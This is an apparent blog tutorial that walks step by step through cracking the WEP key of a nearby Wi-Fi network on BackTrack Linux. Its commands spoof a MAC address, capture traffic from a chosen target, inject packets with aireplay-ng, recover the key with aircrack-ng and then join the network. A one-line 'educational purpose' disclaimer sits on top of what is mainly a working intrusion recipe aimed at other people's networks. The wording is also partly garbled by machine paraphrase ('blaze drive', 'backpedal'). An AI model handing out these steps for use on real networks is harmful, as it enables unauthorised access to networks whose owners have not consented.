Tutorial for Cracking Wifi (WEP) Password Using Linux

Tutorial for Cracking Wifi (WEP) Password Using Linux

This tutorial focus on Cracking Wi-Fi Password using Linux OS, in the previous article I wrote about “Arsenal for Wifi Hacking – Tools You Should Have” make sure you read that tutorial first. We will be using some of those tools in Cracking WEP Passwords. Let’s start the process:

Remark: These and all tutorials at Tricksworld are for educational purpose.

wi-fi-hack-logo

1.Download the BackTrack (Linux OS) kind of you’re decision. You can either boot the OS utilizing VMware inside of windows, or you can boot backtrack straight off of a DVD or blaze drive. Guidelines for each of these systems are on the Back track’s official site.

2.When you have booted up backtrack, it will approach you for a username and secret word; for username: root & for password: toor.

3.Now type startx and press enter. This will log you into backtrack and you should now see the desktop.

4.Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.

5.Type in: airmon-ng

6.Look for the name of your wireless card, its different for a lot of computers, mine is bff1, so for the rest of this tutorial that’s what I’m going to use. Replace bff1 in all the following steps with whatever your device name is.

7.Type in command terminal: airmon-ng stop bff1

8.Type in command terminal: macchanger –mac 00:11:22:33:44:55 bff1

9.Type in command terminal: airmon-ng start bff1

10.Type in command terminal: airodump-ng bff1

11.You will now see the greater part of the wifi systems in extent. When you discovered the one you need to hack, press Ctrl + C to quit filtering. Observe the bssid and channel of the system you need to hack.

12.Type in command terminal: airodump-ng -c (put the channel # here) -w wephack –bssid (enter bssid here) bff1

13.Keep that window open, now open another command terminal and enter the following in the newly opened terminal:

14.Type in command terminal: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 bff1

15.Type in command terminal: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 bff1

16.Presently backpedal to the first window, you’ll see a number relentlessly expanding. Once it’s over around 10,000 you can endeavor to split the WEP key. On the off chance that this doesn’t work, hold up until the (Number#) is much higher, attempt again at a rate of 15,000 or thereabouts.

17.Open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap

You should now see it attempting to crack the WEP key.This could take up to 5 minutes or somewhere in the vicinity relying upon how quick your PC is. When it’s discovered the key, it will show up on the screen. You can now sign into that system utilizing the WEP on the screen.

This tutorial can be used in Ubuntu as well, but you should install Aircracking-ng & Airmong manually because they are not installed as default. Note that these software are already installed in BackTrack

Leave a comment